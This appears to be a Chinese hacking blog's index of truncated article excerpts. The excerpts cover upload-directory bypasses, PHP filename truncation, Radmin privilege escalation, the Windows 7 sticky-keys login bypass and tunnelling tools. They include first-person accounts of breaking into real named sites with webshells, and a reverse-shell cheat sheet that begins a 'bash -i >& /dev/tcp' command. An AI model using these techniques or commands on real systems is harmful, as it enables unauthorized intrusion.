渗透测试
SQL注入执行绕过目录执行脚本限制
前言:这个站我以前已经拿过一次了,后来掉了,以前是找了个地方上传,但是有目录限制,后来用以前发的那个../跳目录跳走了,但是又提示进程占用什么的,然后过了一会儿马竟然变成0KB了,估计有什么东西在作怪,然后跑去贴吧发帖,有个人给我了一个aspx大马,传上去就分分钟秒杀了,提上去有360全套,
渗透DNF黑信站点
昨天晚上一个同学问我,怎么去做一个钓鱼网站。我们聊着聊着就到了DNF黑信这块,我以前写DNF外挂的时候了解过这个黑信。我百度了一下,发现几个黑箱子的网站。不啰嗦了,嘻嘻,开始猥琐吧!站点:http://www.yxheixin.com/(对于这种网站损害玩家利益的网站公开)一:无意的发现我随便就点开了几个页面
奇葩招式跨目录上传
前边的一些步骤就不讲了,这里直接讲怎么奇葩招式跨目录上传的。抓包改包后,成功上传。可是访问出现403,该目录没有执行权限,这里就得跨目录上传,看不看上级目录有没有执行权限。那么奇葩招式来了。在../cs.asp增加一个斜杠,上传后出现500不要管它。接着去掉刚刚加入的斜杠,再点上传,结果如图打
PHP file_put_content函数写文件鸡肋绕过
昨天遇到个站,非常奇葩,把客户的评论写到文件里面,而且开了报错。所以就很容易地看出了那个文件的源码,大概是这样的:<?php $name1 = $_POST; $name2 = $_POST; $val = $_POST; file_put_contents('./company_list/'.$name2.'-'.$name1.'.txt', $val); ?>所以,我就想,能不能把那个.txt截断,然后
Web渗透中的反弹Shell与端口转发的奇淫技巧
转自:https://www.91ri.org/9367.html0x00 前言在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结.0x01 反弹shell1) Bash部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口bash -i >& /dev/tcp/x
rsync的几则tips
转自:http://phpsec.sinaapp.com/?p=245关于rsyncrsync(remote synchronize)——Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人
tunna工具使用实例
转自:http://drops.wooyun.org/tools/650原理:就是个HTTP tunneling工具+-------------------------------------------+ +-------------------------------------------+| Local Host | | Remote Host
radmin hash提权漏洞
radmin是平时在windows下用的比较多的一个远程管理工具。其具有支持多个连接和IP 过滤(即允许特定的IP控制远程机器)、个性化的档互传、远程关机、支持高分辨率模式、基于Windows NT的安全支持及密码保护以及提供日志文件支持等特性。不过老版本的radmin server2.X、radmin server3.0都存在一个“致命”
没有密码且不借助工具临机控制Win7
测试系统:WIN7专业版在国外的网站看到这种方法,不借助其他工具,达到激活管理员帐户或修改开机密码利用在登陆介面按五次shift键的快捷方式来调用粘滞键,正常情况是出现下面这介面操作:开机时按F8让启动界面进入到这里(见下图)然后选择 正常启动Windows选项 时,,,强制关机或者把电源关了再开机
姿势学习:屌丝黑客"追"妹记
第一章:咖啡馆的意外偶遇注:此小说由真实案例改编(请原谅我以这种方式写技术文章) ,尽可能的还原了场景,有不足的地方或者技术不到位的地方请不要喷,尽可能的尊重下分享精神众所周知黑客都是技术宅,在电脑强烈的辐射下,技术宅迟早有一日成为了大家心目中的“屌丝”,当然黑客没有女朋友那是理所
